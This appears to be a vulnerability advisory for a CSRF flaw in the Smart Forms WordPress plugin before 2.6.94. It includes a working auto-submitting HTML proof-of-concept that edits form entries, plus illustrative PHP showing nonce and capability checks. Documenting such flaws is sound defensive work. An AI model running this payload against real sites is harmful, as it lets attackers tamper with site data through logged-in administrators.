WordPress Plugin Vulnerabilities

Smart Forms < 2.6.94 - Edit Entries via CSRF

Description

The plugin lacks CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions, such as editing entries, via CSRF attacks. We consider it a medium risk.

Proof of Concept

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSRF PoC</title>
</head>
<body>
  <h1>CSRF PoC</h1>
  <form id="csrfForm" action="https://YOUR-WEBSITE-URL/wp-admin/admin-ajax.php" method="post" style="display: none;">
    <input type="hidden" name="action" value="rednao_smart_forms_edit_form_values">
    <input type="hidden" name="entryId" value="7">
    <input type="hidden" name="entryString" value='{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}'>
    <input type="hidden" name="elementOptions" value='[{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}]'>
  </form>
  <script>
    // Automatically submit the form when the page loads
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>

Affects Plugins

Fixed in 2.6.94
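
The 2.6.94 patch itself is not reproduced on this page. As an added illustration (not the plugin's code), this is how a WordPress AJAX handler for the action used in the PoC can enforce the missing CSRF check. The handler name, nonce action, capability, script handle and `example_sf_entry_validated` hook are assumptions; only the action name and the `entryId` / `entryString` parameters come from the PoC.

```php
<?php
// Added example, not Smart Forms code. Names prefixed example_/EXAMPLE_ are hypothetical.
const EXAMPLE_NONCE_ACTION = 'example_sf_edit_entry';

// Registered for logged-in users only (no wp_ajax_nopriv_ counterpart).
add_action( 'wp_ajax_rednao_smart_forms_edit_form_values', 'example_sf_edit_entry' );

function example_sf_edit_entry() {
    // 1. CSRF: require a nonce tied to this user, session and action.
    //    With the third argument false, failure returns false instead of dying.
    if ( ! check_ajax_referer( EXAMPLE_NONCE_ACTION, '_ajax_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a valid nonce is not a permission check.
    if ( ! current_user_can( 'manage_options' ) ) { // assumed capability
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input validation: integer entry id, JSON object of { fieldId: { value } }.
    $entry_id = isset( $_POST['entryId'] ) ? absint( $_POST['entryId'] ) : 0;
    $raw      = isset( $_POST['entryString'] ) ? wp_unslash( $_POST['entryString'] ) : '';
    $fields   = json_decode( $raw, true );
    if ( 0 === $entry_id || ! is_array( $fields ) ) {
        wp_send_json_error( array( 'message' => 'Malformed request.' ), 400 );
    }

    $clean = array();
    foreach ( $fields as $field_id => $field ) {
        $field_id = (string) $field_id;
        if ( ! preg_match( '/^[A-Za-z0-9_]+$/', $field_id ) ) {
            continue; // drop unexpected field identifiers
        }
        if ( is_array( $field ) && isset( $field['value'] ) && is_scalar( $field['value'] ) ) {
            $clean[ $field_id ] = sanitize_textarea_field( (string) $field['value'] );
        }
    }

    // Hypothetical hook: the storage layer subscribes here and persists the entry.
    do_action( 'example_sf_entry_validated', $entry_id, $clean );
    wp_send_json_success( array( 'entryId' => $entry_id ) );
}

// The admin screen that legitimately edits entries hands the nonce to its script
// ('example-sf-admin' is a hypothetical, already-registered script handle).
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'example-sf-admin', 'exampleSf', array(
        'nonce' => wp_create_nonce( EXAMPLE_NONCE_ACTION ),
    ) );
} );
```

A cross-site form such as the PoC cannot read the nonce issued to the admin screen, so its request is rejected with a 403 at step 1 before any entry data is parsed.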

Miscellaneous

Original Researcher
Amir Hossein Fallahi
Submitter
Amir Hossein Fallahi
Verified
Yes

Timeline

Publicly Published
2024-03-25
Added
2024-03-25
Last Updated
2024-03-25